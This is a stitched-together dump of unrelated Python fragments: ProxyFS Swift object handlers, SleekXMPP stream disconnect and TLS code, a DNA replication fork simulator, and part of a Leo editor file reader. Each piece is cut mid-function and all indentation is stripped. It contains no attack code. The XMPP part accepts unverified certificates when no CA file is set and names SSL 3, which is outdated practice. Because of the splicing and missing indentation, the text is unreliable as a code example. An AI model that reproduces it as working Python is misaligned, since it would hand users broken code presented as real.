# If there's an error renewing the lease, stop pestering
# proxyfsd about it. We'll keep serving the object
# anyway, and we'll just hope no log segments vanish
# while we do it.
keep_going[0] = False
lease_error[0] = True
# It could have been a while since this greenthread was created.
# Let's renew first just to be sure.
renew()
while keep_going[0]:
try:
channel.get(block=True, timeout=LEASE_RENEWAL_INTERVAL)
# When we get a message here, we should stop.
keep_going[0] = False
except eventlet.queue.Empty:
# Nobody told us we're done, so renew the lease and loop
# around again.
renew()
if not lease_error[0]:
# Tell proxyfsd that we're done with the lease, but only if
# there were no errors keeping it renewed.
self.rpc_call(ctx, rpc.release_lease_request(lease_id))
channel.put("alright, it's done")
def delete_object(self, ctx):
try:
self.rpc_call(ctx, rpc.delete_request(
urllib_parse.unquote(ctx.req.path)))
except utils.RpcError as err:
if err.errno in (pfs_errno.NotFoundError, pfs_errno.NotDirError):
return swob.HTTPNotFound(request=ctx.req)
elif err.errno == pfs_errno.NotEmptyError:
return swob.HTTPConflict(request=ctx.req)
else:
raise
return swob.HTTPNoContent(request=ctx.req)
def head_object(self, ctx):
req = ctx.req
head_request = rpc.head_request(urllib_parse.unquote(req.path))
try:
head_response = self.rpc_call(ctx, head_request)
except utils.RpcError as err:
if err.errno in (pfs_errno.NotFoundError, pfs_errno.NotDirError):
return swob.HTTPNotFound(request=req)
else:
raise
raw_md, last_modified_ns, file_size, is_dir, ino, num_writes = \
rpc.parse_head_response(head_response)
metadata = deserialize_metadata(raw_md)
unmung_etags(metadata, num_writes)
headers = swob.HeaderKeyDict(metadata)
if "Content-Type" not in headers:
headers["Content-Type"] = guess_content_type(req.path, is_dir)
else:
headers['Content-Type'] = headers['Content-Type'].split(
';swift_bytes=')[0]
headers["Content-Length"] = file_size
headers["ETag"] = best_possible_etag(
headers, ctx.account_name, ino, num_writes, is_dir=is_dir)
headers["Last-Modified"] = last_modified_from_epoch_ns(
last_modified_ns)
headers["X-Timestamp"] = x_timestamp_from_epoch_ns(
last_modified_ns)
resp = swob.HTTPOk(request=req, headers=headers,
conditional_response=True)
# Support conditional if-match/if-none-match requests for SLOs
resp._conditional_etag = swift_code.resolve_etag_is_at_header(
req, resp.headers)
return resp
def coalesce_object(self, ctx, auth_cb):
# extract and verify the object list for the new object
req = ctx.req
object_path = urllib_parse.unquote(req.path)
probably_json = req.environ['wsgi.input'].read(
self.max_coalesce_request_size + 1)
if len(probably_json) > self.max_coalesce_request_size:
return swob.HTTPRequestEntityTooLarge(request=req)
try:
decoded_json = json.loads(probably_json)
except ValueError:
return swob.HTTPBadRequest(request=req, body="Malformed JSON")
if "elements" not in decoded_json:
return swob.HTTPBadRequest(request=req, body="Malformed JSON")
if not isinstance(decoded_json, dict):
return swob.HTTPBadRequest(request=req, body="Malformed JSON")
if not isinstance(decoded_json["elements"], list):
return swob.HTTPBadRequest(request=req, body="Malformed JSON")
if len(decoded_json["elements"]) > self.max_coalesce:
return swob.HTTPRequestEntityTooLarge(request=req)
authed_containers = set()
ctx.req.environ.setdefault('swift.infocache', {})
for elem in decoded_json["elements"]:
if not isinstance(elem, six.string_types):
return swob.HTTPBadRequest(request=req, body="Malformed JSON")
normalized_elem = elem
if normalized_elem.startswith('/'):
normalized_elem = normalized_elem[1:]
if any(p in ('', '.', '..') for p in normalized_elem.split('/')):
return swob.HTTPBadRequest(request=req,
body="Bad element path: %s" % elem)
elem_container = normalized_elem.split('/', 1)[0]
elem_container_path = '/v1/%s/%s' % (
ctx.account_name, elem_container)
if auth_cb and elem_container_path not in authed_containers:
# Gotta check auth for all of the segments, too
bimodal_checker = ctx.req.environ[utils.ENV_BIMODAL_CHECKER]
acl_env = ctx.req.environ.copy()
acl_env['PATH_INFO'] = swift_code.text_to_wsgi(
elem_container_path)
container_info = get_container_info(
acl_env, bimodal_checker,
swift_source="PFS")
for acl in ('read_acl', 'write_acl'):
req.acl = container_info[acl]
denial_response = auth_cb(ctx.req)
if denial_response:
return denial_response
authed_containers.add(elem_container_path)
# proxyfs treats the number of objects as the number of writes
num_writes = len(decoded_json["elements"])
# validate the metadata for the new object (further munging
# of ETags will be done later)
err = constraints.check_metadata(req, 'object')
if err:
return err
# retrieve the ETag value in the request, or None
req_etag = req.headers.get('ETag')
# strip out user supplied and other unwanted headers
obj_metadata = extract_object_metadata_from_headers(req.headers)
# strip out headers that apply only to SLO objects
unwanted_headers = ['X-Static-Large-Object']
for header in obj_metadata.keys():
if header.startswith("X-Object-Sysmeta-Slo-"):
unwanted_headers.append(header)
for header in unwanted_headers:
if header in obj_metadata:
del obj_metadata[header]
# Now that we know the number of writes (really number of objects) we
# can mung the sundry ETag headers.
mung_etags(obj_metadata, req_etag, num_writes)
raw_obj_metadata = serialize_metadata(obj_metadata)
# now get proxyfs to coalesce the objects and set initial headers
try:
coalesce_response = self.rpc_call(
ctx, rpc.coalesce_object_request(
object_path, decoded_json["elements"], raw_obj_metadata))
except utils.RpcError as err:
if err.errno == pfs_errno.NotFoundError:
return swob.HTTPNotFound(
request=req,
headers={"Content-Type": "text/plain"},
body="One or more path elements not found")
elif err.errno in (pfs_errno.NotDirError, pfs_errno.IsDirError):
return swob.HTTPConflict(
request=req,
headers={"Content-Type": "text/plain"},
body="Elements must be plain files, not directories")
elif err.errno == pfs_errno.TooManyLinksError:
return swob.HTTPConflict(
request=req,
headers={"Content-Type": "text/plain"},
body=("One or more path elements has multiple links; "
"only singly-linked files can be combined"))
else:
raise
last_modified_ns, inum, num_writes = \
rpc.parse_coalesce_object_response(coalesce_response)
unmung_etags(obj_metadata, | |
time.
"""
def _handle_session_timeout():
if not self.session_started_event.is_set():
log.debug("Session start has taken more " + \
"than %d seconds", self.session_timeout)
self.disconnect(reconnect=self.auto_reconnect)
self.schedule("Session timeout check",
self.session_timeout,
_handle_session_timeout)
def disconnect(self, reconnect=False, wait=None, send_close=True):
"""Terminate processing and close the XML streams.
Optionally, the connection may be reconnected and
resume processing afterwards.
If the disconnect should take place after all items
in the send queue have been sent, use ``wait=True``.
.. warning::
If you are constantly adding items to the queue
such that it is never empty, then the disconnect will
not occur and the call will continue to block.
:param reconnect: Flag indicating if the connection
and processing should be restarted.
Defaults to ``False``.
:param wait: Flag indicating if the send queue should
be emptied before disconnecting, overriding
:attr:`disconnect_wait`.
:param send_close: Flag indicating if the stream footer
should be sent before terminating the
connection. Setting this to ``False``
prevents error loops when trying to
disconnect after a socket error.
"""
self.state.transition('connected', 'disconnected',
wait=2.0,
func=self._disconnect,
args=(reconnect, wait, send_close))
def _disconnect(self, reconnect=False, wait=None, send_close=True):
if not reconnect:
self.auto_reconnect = False
if self.end_session_on_disconnect or send_close:
self.event('session_end', direct=True)
# Wait for the send queue to empty.
if wait is not None:
if wait:
self.send_queue.join()
elif self.disconnect_wait:
self.send_queue.join()
# Clearing this event will pause the send loop.
self.session_started_event.clear()
self.__failed_send_stanza = None
# Send the end of stream marker.
if send_close:
self.send_raw(self.stream_footer, now=True)
# Wait for confirmation that the stream was
# closed in the other direction. If we didn't
# send a stream footer we don't need to wait
# since the server won't know to respond.
if send_close:
log.info('Waiting for %s from server', self.stream_footer)
self.stream_end_event.wait(4)
else:
self.stream_end_event.set()
if not self.auto_reconnect:
self.set_stop()
if self._disconnect_wait_for_threads:
self._wait_for_threads()
try:
self.socket.shutdown(Socket.SHUT_RDWR)
self.socket.close()
self.filesocket.close()
except (Socket.error, ssl.SSLError) as serr:
self.event('socket_error', serr, direct=True)
finally:
#clear your application state
self.event('disconnected', direct=True)
return True
def abort(self):
self.session_started_event.clear()
self.set_stop()
if self._disconnect_wait_for_threads:
self._wait_for_threads()
try:
self.socket.shutdown(Socket.SHUT_RDWR)
self.socket.close()
self.filesocket.close()
except Socket.error:
pass
self.state.transition_any(['connected', 'disconnected'], 'disconnected', func=lambda: True)
self.event("killed", direct=True)
def reconnect(self, reattempt=True, wait=False, send_close=True):
"""Reset the stream's state and reconnect to the server."""
log.debug("reconnecting...")
if self.state.ensure('connected'):
self.state.transition('connected', 'disconnected',
wait=2.0,
func=self._disconnect,
args=(True, wait, send_close))
attempts = self.reconnect_max_attempts
log.debug("connecting...")
connected = self.state.transition('disconnected', 'connected',
wait=2.0,
func=self._connect,
args=(reattempt,))
while reattempt and not connected and not self.stop.is_set():
connected = self.state.transition('disconnected', 'connected',
wait=2.0, func=self._connect)
connected = connected or self.state.ensure('connected')
if not connected:
if attempts is not None:
attempts -= 1
if attempts <= 0:
self.event('connection_failed', direct=True)
return False
return connected
def set_socket(self, socket, ignore=False):
"""Set the socket to use for the stream.
The filesocket will be recreated as well.
:param socket: The new socket object to use.
:param bool ignore: If ``True``, don't set the connection
state to ``'connected'``.
"""
self.socket = socket
if socket is not None:
# ElementTree.iterparse requires a file.
# 0 buffer files have to be binary.
# Use the correct fileobject type based on the Python
# version to work around a broken implementation in
# Python 2.x.
if sys.version_info < (3, 0):
self.filesocket = FileSocket(self.socket)
else:
self.filesocket = self.socket.makefile('rb', 0)
if not ignore:
self.state._set_state('connected')
def configure_socket(self):
"""Set timeout and other options for self.socket.
Meant to be overridden.
"""
self.socket.settimeout(None)
def configure_dns(self, resolver, domain=None, port=None):
"""
Configure and set options for a :class:`~dns.resolver.Resolver`
instance, and other DNS related tasks. For example, you
can also check :meth:`~socket.socket.getaddrinfo` to see
if you need to call out to ``libresolv.so.2`` to
run ``res_init()``.
Meant to be overridden.
:param resolver: A :class:`~dns.resolver.Resolver` instance
or ``None`` if ``dnspython`` is not installed.
:param domain: The initial domain under consideration.
:param port: The initial port under consideration.
"""
pass
def start_tls(self):
"""Perform handshakes for TLS.
If the handshake is successful, the XML stream will need
to be restarted.
"""
log.info("Negotiating TLS")
ssl_versions = {3: 'TLS 1.0', 1: 'SSL 3', 2: 'SSL 2/3'}
log.info("Using SSL version: %s", ssl_versions[self.ssl_version])
if self.ca_certs is None:
cert_policy = ssl.CERT_NONE
else:
cert_policy = ssl.CERT_REQUIRED
ssl_args = safedict({
'certfile': self.certfile,
'keyfile': self.keyfile,
'ca_certs': self.ca_certs,
'cert_reqs': cert_policy,
'do_handshake_on_connect': False
})
if sys.version_info >= (2, 7):
ssl_args['ciphers'] = self.ciphers
ssl_socket = ssl.wrap_socket(self.socket, **ssl_args);
if hasattr(self.socket, 'socket'):
# We are using a testing socket, so preserve the top
# layer of wrapping.
self.socket.socket = ssl_socket
else:
self.socket = ssl_socket
try:
self.socket.do_handshake()
except (Socket.error, ssl.SSLError):
log.error('CERT: Invalid certificate trust chain.')
if not self.event_handled('ssl_invalid_chain'):
self.disconnect(self.auto_reconnect, send_close=False)
else:
self._der_cert = self.socket.getpeercert(binary_form=True)
self.event('ssl_invalid_chain', direct=True)
return False
self._der_cert = self.socket.getpeercert(binary_form=True)
pem_cert = ssl.DER_cert_to_PEM_cert(self._der_cert)
log.debug('CERT: %s', pem_cert)
self.event('ssl_cert', pem_cert, direct=True)
try:
cert.verify(self._expected_server_name, self._der_cert)
except cert.CertificateError as err:
if not self.event_handled('ssl_invalid_cert'):
log.error(err)
self.disconnect(self.auto_reconnect, send_close=False)
else:
self.event('ssl_invalid_cert', pem_cert, direct=True)
self.set_socket(self.socket)
return True
def _cert_expiration(self, event):
"""Schedule an event for when the TLS certificate expires."""
if not self.use_tls and not self.use_ssl:
return
if not self._der_cert:
log.warn("TLS or SSL was enabled, but no certificate was found.")
return
def restart():
if not self.event_handled('ssl_expired_cert'):
log.warn("The server certificate has expired. Restarting.")
self.reconnect()
else:
pem_cert = ssl.DER_cert_to_PEM_cert(self._der_cert)
self.event('ssl_expired_cert', pem_cert)
cert_ttl = cert.get_ttl(self._der_cert)
if cert_ttl is None:
return
if cert_ttl.days < 0:
log.warn('CERT: Certificate has expired.')
restart()
try:
total_seconds = cert_ttl.total_seconds()
except AttributeError:
# for Python < 2.7
total_seconds = (cert_ttl.microseconds + (cert_ttl.seconds + cert_ttl.days * 24 * 3600) * 10**6) / 10**6
log.info('CERT: Time until certificate expiration: %s' % cert_ttl)
self.schedule('Certificate Expiration',
total_seconds,
restart)
def _start_keepalive(self, event):
"""Begin sending whitespace periodically to keep the connection alive.
May be disabled by setting::
self.whitespace_keepalive = False
The keepalive interval can be set using::
self.whitespace_keepalive_interval = 300
"""
if self.whitespace_keepalive:
self.schedule('Whitespace Keepalive',
self.whitespace_keepalive_interval,
self.send_raw,
args=(' ',),
kwargs={'now': True},
repeat=True)
def _remove_schedules(self, event):
"""Remove whitespace keepalive and certificate expiration schedules."""
self.scheduler.remove('Whitespace Keepalive')
self.scheduler.remove('Certificate Expiration')
def start_stream_handler(self, xml):
"""Perform any initialization actions, such as handshakes,
once the stream header has been sent.
Meant to be overridden.
"""
pass
def register_stanza(self, stanza_class):
"""Add a stanza object class as a known root stanza.
A root stanza is one that appears as a direct child of the stream's
root element.
Stanzas that appear as substanzas of a root stanza do not need to
be registered here. That is done using register_stanza_plugin() from
sleekxmpp.xmlstream.stanzabase.
Stanzas that are not registered will not be converted into
stanza objects, but may still be processed using handlers and
matchers.
:param stanza_class: The top-level stanza object's class.
"""
self.__root_stanza.append(stanza_class)
def remove_stanza(self, stanza_class):
"""Remove a stanza from being a known root stanza.
A root stanza is one that appears as a direct child of the stream's
root element.
Stanzas that are not registered will not be converted into
stanza objects, but may still be processed using handlers and
matchers.
"""
self.__root_stanza.remove(stanza_class)
def add_filter(self, mode, handler, order=None):
"""Add a filter for incoming or outgoing stanzas.
These filters are applied before incoming stanzas are
passed to any handlers, and before outgoing stanzas
are put in the send queue.
Each filter must accept a single stanza, and return
either a stanza or ``None``. If the filter returns
``None``, then the stanza will be dropped from being
processed for events or from being sent.
:param mode: One of ``'in'`` or ``'out'``.
:param handler: The filter function.
:param int order: The position to insert the filter in
the list of active filters.
"""
if order:
self.__filters[mode].insert(order, handler)
else:
self.__filters[mode].append(handler)
def del_filter(self, mode, handler):
"""Remove an incoming or outgoing filter."""
self.__filters[mode].remove(handler)
def add_handler(self, mask, pointer, name=None, disposable=False,
threaded=False, filter=False, instream=False):
"""A shortcut method for registering a handler using XML masks.
The use of :meth:`register_handler()` is preferred.
:param mask: An XML snippet matching the structure of the
stanzas that will be passed to this handler.
:param pointer: The handler function itself.
:parm name: A unique name for the handler. A name will
be generated if one is not provided.
:param disposable: Indicates if the handler should be discarded
after one use.
:param threaded: **DEPRECATED**.
Remains for backwards compatibility.
:param filter: **DEPRECATED**.
Remains for backwards compatibility.
:param instream: Indicates if the handler should execute during
stream processing and not during normal event
processing.
"""
# To prevent | |
import numpy as np
from collections import namedtuple
from pomegranate import GeneralMixtureModel,NormalDistribution
import pandas as pd
def smooth(ser, sc):
return np.array(pd.Series(ser).rolling(sc, min_periods=1, center=True).mean())
origin = namedtuple("origin",["pos","firing_time","L_fork_speed","R_fork_speed"])
Pause = namedtuple("pause",["pos","duration"])
def track(time,start_time=2,end_time=15,maxv=0.8,minv=0.1,inct=1,pulselen=4,dect=5):
"""
Given a 1D array of time , generate a single fork
following an exponential increasing law between start_time and start_time + pulselen
followed by a decreasing exponential law.
The ascending part is governed by maxv and inct (the characteristic time of the exponential)
The descending part by minv and dect (the characteristic time of the exponential)
It return a 1d array with the results, as well a the actual length of the ascending
part (that can be truncated) and the length of the background part before the ascending
exponential
"""
before = time[time<=start_time]
initial = time[ (time > start_time) & (time < start_time + pulselen)]
if len(initial) != 0:
initial = maxv*(1-np.exp(-(initial-start_time)/inct))
final = time[(time >= start_time + pulselen) & (time < end_time)]
if len(initial) != 0:
startv = initial[-1]
else:
startv = maxv*(1-np.exp(-(pulselen)/inct))
if len(final) != 0:
final = startv + (minv -startv)*(1-np.exp(-(final-start_time-pulselen)/dect))
end = time[time >= end_time]
result = np.concatenate([np.zeros_like(before),initial,final,np.zeros_like(end)])
#print(maxv,np.max(result))
return result,len(initial),len(before)
def intersection(p1,p2,pause=[0,0]):
"""
Given two converging forks and their firing time and speeds,
compute the position of the intersection
as well as the position of the time of intersection.
If the intersection is outside [x1,x2], the initial position of the forks,
then return False
"""
x1,t1,R_fork_speed=p1.pos,p1.firing_time,p1.R_fork_speed
x2,t2,L_fork_speed=p2.pos,p2.firing_time,p2.L_fork_speed
t1 += pause[0]
t2 += pause[1]
assert(x2>x1)
#x = (x1+x2)/2 + (t2-t1)*v/2
x = 1/(1/L_fork_speed+1/R_fork_speed)*(t2-t1 + x1/L_fork_speed+x2/R_fork_speed)
if not( x1<x<x2):
return False,[None,None]
t = (x2-x1)/(R_fork_speed+L_fork_speed) + (t1 * R_fork_speed + t2 * L_fork_speed)/(R_fork_speed+L_fork_speed)
return True,[x,t]
def generate_mrt(pos_time,end=1000,start_at_zero=True):
"""
Given a list of origin and firing times and fork speed
return a 1d arry with the times at which the replication occurs
By default the lowest time is zero.
To do so it build a list with position and time of initiation and termination
and then use numpy linera interpolation function
"""
#print(pos_time)
x1,t1,L_fork_speed = pos_time[0].pos,pos_time[0].firing_time,pos_time[0].L_fork_speed
first = [0,t1+x1/L_fork_speed]
pos_with_terms = [first]
for p1,p2 in zip(pos_time[:-1],pos_time[1:]):
possible,inte = intersection(p1,p2)
pos_with_terms.extend([[p1.pos,p1.firing_time],inte+[]])
if not possible:
return False
if len(pos_time) == 1:
p2 = pos_time[0]
pos_with_terms.append([p2.pos,p2.firing_time])
x2,t2,R_fork_speed=p2.pos,p2.firing_time,p2.R_fork_speed
pos_with_terms.append([end,t2+(end-x2)/R_fork_speed])
p = np.array(pos_with_terms)
#print(p)
mrt = np.interp(np.arange(end),p[:,0],p[:,1])
if start_at_zero:
return mrt-np.min(mrt)
else:
return mrt
def generate_rfd(pos_time,end=1000):
"""
Given a list of origin and firing times and fork speed
return the direction of replication
"""
#print(pos_time)
rfd = np.zeros(end)
x1,t1,L_fork_speed = pos_time[0].pos,pos_time[0].firing_time,pos_time[0].L_fork_speed
rfd[:x1] = -1
for p1,p2 in zip(pos_time[:-1],pos_time[1:]):
possible,inte = intersection(p1,p2)
middle = int(round(inte[0],0))
rfd[p1.pos:middle]=1
rfd[middle:p2.pos]=-1
if len(pos_time) == 1:
x2,t2=x1,t1
else:
x2,t2=p2.pos,p2.firing_time
rfd[x2:]=1
return rfd
def generate_track(pos_time,start_time=10,end=1000,params={},same_parameters=True,pauses=[]):
"""
Given a list of origin and firing times and fork speed
and a start_time for the injection of Brdu return the incorporation
of Brdu corresponding.
"""
param_k = ["maxv","minv","pulselen","inct","dect"]
list_param_generated=[]
def generate_params(param_k,already_done={}):
if already_done != {}:
return already_done
kw={}
for p in param_k:
if type(params[p]) == list:
kw[p] = params[p][0] + (params[p][1]-params[p][0])*np.random.rand()
else:
kw[p] = params[p]
list_param_generated.append(kw)
return kw
kw = {}
if same_parameters:
kw = generate_params(param_k)
if len(pauses) ==0:
pauses=[Pause(pos=None,duration=0)] * (len(pos_time)+1)
#CHeck that pauses are ordered
if len(pauses)>1:
for p1,p2 in zip(pauses[:-1],pauses[1:]):
if p1.pos != None and p2.pos != None:
assert(p1.pos<p2.pos)
#insert empty pauses and order pause. check only one pause between all ori
#print("Before",pauses)
#print(pauses)
if len(pauses) != (len(pos_time)+1):
f_pauses=[None]*(len(pos_time)+1)
p_ori_order=[ori.pos for ori in pos_time]
#print(p_ori_order)
startp=0
if pauses[0].pos<p_ori_order[0]:
f_pauses[0]=pauses[0]
startp=1
for pause in pauses[startp:]:
for ipos in range(len(p_ori_order)-1):
if p_ori_order[ipos+1]>pause.pos>=p_ori_order[ipos]:
if f_pauses[ipos+1] != None:
print("At least two pauses located between two origins")
print("Origins",pos_ori)
print("Pauses",pauses)
raise
else:
f_pauses[ipos+1]=pause
if pauses[-1].pos>p_ori_order[-1]:
f_pauses[-1]=pauses[-1]
for i in range(len(f_pauses)):
if f_pauses[i] == None:
f_pauses[i]=Pause(pos=None,duration=0)
#print("After",f_pauses)
pauses=f_pauses
else:
#Pauses must be located between origins
for pause,ori in zip(pauses,pos_time):
if pause.pos != None:
assert(pause.pos<=ori.pos)
for pause,ori in zip(pauses[1:],pos_time[:]):
if pause.pos != None:
assert(pause.pos>=ori.pos)
assert(len(pauses)==len(pos_time)+1)
#def generate_time(start_t,pos_end,speed,pause=0):
# return np.arange(start_t,start_t+pos_end/speed,1/speed)
trac = np.zeros(end)
x1,t1,L_fork_speed = pos_time[0].pos,pos_time[0].firing_time,pos_time[0].L_fork_speed
time= np.arange(t1,t1+x1/L_fork_speed,1/L_fork_speed)
if pauses[0].duration != 0:
#print(pauses)
time[x1-pauses[0].pos:]+=pauses[0].duration
t,len_init,before = track(time,start_time=start_time,end_time=t1+x1/L_fork_speed+pauses[0].duration,
**generate_params(param_k,kw))
trac[:x1] = t[:x1][::-1]
#print(len_init)
mrt = [time[:x1][::-1]]
#mrt[:x1] = time[:x1][::-1]
len_initial = [len_init + 0] #store the length of the increasing parts
pos_s = [[x1-len_init-before,x1-before]]
for interval,(p1,p2,pause) in enumerate(zip(pos_time[:-1],pos_time[1:],pauses[1:]),1):
if pause.duration !=0:
assert(p2.pos>pause.pos>p1.pos)
possible,inte = intersection(p1,p2)
middle = int(round(inte[0]))
first_encounter_pause=True
if pause.duration!=0:
if middle > pause.pos:
#First fork get their first
delta=middle-pause.pos
delta_t=delta/p2.L_fork_speed
if delta_t>pause.duration:
#Then fork1 finish its pause
#Equivalent to starting late of time pause
possible,inte = intersection(p1,p2,pause=[pause.duration,0])
middle = int(round(inte[0]))
else:
pauses[interval] = Pause(pos=pause.pos,duration=delta/p2.L_fork_speed)
pause=pauses[interval]
middle = pause.pos
else:
first_encounter_pause = False
delta=pause.pos-middle
delta_t=delta/p1.L_fork_speed
if delta_t >pause.duration:
#Then fork2 finish its pause
possible,inte = intersection(p1,p2,pause=[0,pause.duration])
middle = int(round(inte[0]))
else:
pauses[interval] = Pause(pos=pause.pos,duration=delta/p1.L_fork_speed)
pause=pauses[interval]
middle = pause.pos
size = len(trac[p1[0]:middle])
starto = p1.firing_time
R_fork_speed = p1.R_fork_speed
time= np.arange(starto,starto+size/R_fork_speed,1/R_fork_speed)
end_cover=0
if pause.duration != 0:
end_cover=pause.duration
if first_encounter_pause and pause.duration !=0:
time[pause.pos-p1.pos:] += pause.duration
mrt.append(time[:size])
#print(time)
#print(time,len(time))
#print(p1[0],p2[0],middle)
#print(track(time,start_time=start_time,end_time=starto+size/v)[:size])
#trac[p1.pos:middle]
t,len_init,before= track(time,start_time=start_time,end_time=starto+size/R_fork_speed+end_cover,
**generate_params(param_k,kw))
trac[p1.pos:middle] = t[:size]
len_initial.append(len_init + 0)
pos_s += [[p1.pos+before,p1.pos+len_init+before]]
size = len(trac[middle:p2.pos])
starto = p2.firing_time
L_fork_speed = p2.L_fork_speed
time= np.arange(starto,starto+size/L_fork_speed,1/L_fork_speed)
if not first_encounter_pause and pause.duration !=0:
time[p2.pos-pause.pos:] += pause.duration
mrt.append(time[:size][::-1])
#print(time,len(time))
trac[middle:p2.pos]
t,len_init,before = track(time,start_time=start_time,end_time=starto+size/L_fork_speed+end_cover,
**generate_params(param_k,kw))
trac[middle:p2.pos] = t[:size][::-1]
len_initial.append(len_init + 0)
pos_s += [[p2.pos-len_init-before,p2.pos-before]]
if len(pos_time) == 1:
x2,t2 = x1,t1
R_fork_speed = pos_time[0].R_fork_speed
else:
x2,t2=p2.pos,p2.firing_time
R_fork_speed = p2.R_fork_speed
size = len(trac[x2:])
time= np.arange(t2,t2+size/R_fork_speed,1/R_fork_speed)
if pauses[-1].duration != 0:
#print(pauses)
time[pauses[-1].pos-x2:]+=pauses[-1].duration
mrt.append(time[:size])
#mrt[x2:] = time[:size]
t,len_init,before = track(time,start_time=start_time,end_time=t2+size/R_fork_speed+pauses[-1].duration,
**generate_params(param_k,kw))
trac[x2:] = t[:size]
len_initial.append(len_init + 0)
pos_s += [[x2+before,x2+len_init+before]]
if not same_parameters:
kw = list_param_generated
#print(len(trac),len(np.concatenate(mrt)))
#print(pauses,R_fork_speed)
return trac,[len_initial,pos_s],kw,mrt
def create_possible_origins(n_ori,n_sim,average_fork_speed,chlen,scaling=15):
"""
generate a list of possible simulation given a number of origin an average_fork_speed
"""
sims =[]
while len(sims) != n_sim:
pos = np.random.randint(0,chlen,n_ori)
times = np.random.randint(0,chlen/n_ori/scaling,n_ori)
times -= min(times)
pos.sort()
if len(set(pos)) != len(pos):
continue
#print(pos)
sim = [origin(p,t,average_fork_speed,average_fork_speed) for p,t in zip(pos,times)]
if type(generate_mrt(sim)) != bool:
sims.append(sim)
return sims
if __name__ == "__main__":
import argparse
import uuid
import json
from scipy import stats
import pandas as pd
import pylab
import ast
np.random.seed(0)
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--prefix', type=str,default="mock")
parser.add_argument('--parameter_file', type=str,default='data/params.json')
parser.add_argument('--average_distance_between_ori', type=float, default=50000)
parser.add_argument('--multi',dest="one_fork", action="store_false")
parser.add_argument('--correct_for_height', action="store_true")
parser.add_argument('--ground_truth', action="store_true")
parser.add_argument('--fork_position', action="store_true",
help="record fork positions")
parser.add_argument('--resolution', type=int, default=100,
help="resolution in bp of the simulation")
parser.add_argument('--n_conf_ori', type=int, default=400,
help="Generate set of ori and firing times")
parser.add_argument('--time_per_mrt', type=int, default=400,
help="Generate time of starting pulse per configuration")
parser.add_argument('--read_per_time', type=int, default=1,
help="Correspond to truncated fiber when the option whole_length"
"is set to False")
parser.add_argument('--draw_sample', type=int,default=0)
parser.add_argument('--conf',type=str,default=None,help="configuration of origins to simulate from")
parser.add_argument('--test', action="store_true")
parser.add_argument('--whole_length', action="store_true")
parser.add_argument('--length', type=int,default=None)
args = parser.parse_args()
##############################################
# Generate track parameters
with open(args.parameter_file,"r") as f:
params = json.load(f)
# maxv: lowest highest value of the plateau when increasing
# minv:[0.12-0.05,0.15-0.05], #l owest highest value of the plateau when decreasing
# pulselen":[2,2], # smallest longest value of the pulse length in minute
# inct : [.25,1.25], # lowest highest value ofcharacteristic time of the increasing exponential
# dect : [2.,5]
#############################################
#Either create ori at specific position and firing time
average_fork_speed=15 # in 100 bp/min
Sim = [[origin(50,2,average_fork_speed,average_fork_speed),
origin(70,2,average_fork_speed,average_fork_speed)]]
##############################################
#Choose fiber size and distributions
resolution = args.resolution
if not args.one_fork:
chlen=300000 // resolution
whole_length=False
else:
chlen = 50000 // resolution
whole_length=True
if args.test:
chlen=50000 //resolution
whole_length=True
if args.whole_length:
whole_length=True
if args.length != None:
chlen=int(args.length/resolution)
possiblesize = np.arange(5000//resolution,chlen)
distribsize = stats.lognorm(0.5,scale=35000/resolution).pdf(possiblesize)
distribsize /= np.sum(distribsize)
nfork = {}
pos={}
fiber = {}
rfd = {}
mrts = {}
gt = {}
parameters = {}
all_speeds={}
positions = {}
def draw(law):
if law["type"] == "pomegranate":
return GeneralMixtureModel.from_json(law["params"]).sample(1)
if law["type"] == "choices":
return np.random.choices(law["params"])
if law["type"] == "uniform":
return law["params"][0] + (law["params"][1]-law["params"][0])*np.random.rand()
if law["type"] == "normal":
return np.random.normal(loc=law["params"][0] ,scale=law["params"][1])
if law["type"] == "exp":
if "data" not in law:
law["data"] = pd.read_csv(law["params"])["data"]
which = int(np.random.randint(len(law["data"])))
shift=0
if "shift" in law:
shift= law["shift"]
return law["data"][which]+shift
if args.conf != None:
Confs = []
Pauses = []
with open(args.conf,"r") as f:
for line in f.readlines():
new_conf = ast.literal_eval(line)
average_fork_speed = draw(params["speed"]) / resolution
ori_pos =[]
for ori in new_conf[0]:
if len(ori)==4:
ori[0] = int(ori[0]/resolution)
ori_pos.append(origin(*ori))
elif len(ori)==2:
ori[0] /=resolution
ori_pos.append(origin(int(ori[0]),ori[1],average_fork_speed,average_fork_speed))
else:
raise
Confs.append(ori_pos)
if len(new_conf)==2:
| |
values are vnodes.
self.path = None
self.root = None
self.VNode = TestVNode if test else leoNodes.VNode
self.test = test
#@+others
#@+node:ekr.20180602103135.3: *3* fast_at.get_patterns
#@@nobeautify
def get_patterns(self, delims):
'''Create regex patterns for the given comment delims.'''
# This must be a function, because of @comments & @delims.
delim_start, delim_end = delims
delims = re.escape(delim_start), re.escape(delim_end or '')
delim_start, delim_end = delims
patterns = (
# The list of patterns, in alphabetical order.
# These patterns must be mutually exclusive.
r'^\s*%s@afterref%s$'%delims, # @afterref
r'^(\s*)%s@(\+|-)all\b(.*)%s$'%delims, # @all
r'^\s*%s@@c(ode)?%s$'%delims, # @c and @code
r'^\s*%s@comment(.*)%s'%delims, # @comment
r'^\s*%s@delims(.*)%s'%delims, # @delims
r'^\s*%s@\+(at|doc)?(\s.*?)?%s\n'%delims, # @doc or @
r'^\s*%s@end_raw\s*%s'%delims, # @end_raw
r'^\s*%s@@first%s$'%delims, # @first
r'^\s*%s@@last%s$'%delims, # @last
r'^(\s*)%s@\+node:([^:]+): \*(\d+)?(\*?) (.*)%s$'%delims, # @node
r'^(\s*)%s@(\+|-)others\b(.*)%s$'%delims, # @others
r'^\s*%s@raw(.*)%s'%delims, # @raw
r'^(\s*)%s@(\+|-)%s\s*%s$'%( # section ref
delim_start, g.angleBrackets('(.*)'), delim_end)
)
# Return the compiled patterns, in alphabetical order.
return (re.compile(pattern) for pattern in patterns)
#@+node:ekr.20180603060721.1: *3* fast_at.post_pass
def post_pass(self, gnx2body, gnx2vnode, root_v):
'''Set all body text.'''
# Set the body text.
if self.test:
# Check the keys.
bkeys = sorted(gnx2body.keys())
vkeys = sorted(gnx2vnode.keys())
if bkeys != vkeys:
g.trace('KEYS MISMATCH')
g.printObj(bkeys)
g.printObj(vkeys)
if self.test:
sys.exit(1)
# Set the body text.
for key in vkeys:
v = gnx2vnode.get(key)
body = gnx2body.get(key)
v._bodyString = ''.join(body)
else:
assert root_v.gnx in gnx2vnode, root_v
assert root_v.gnx in gnx2body, root_v
# Don't use items(): it doesn't exist in Python 2.
for key in gnx2body:
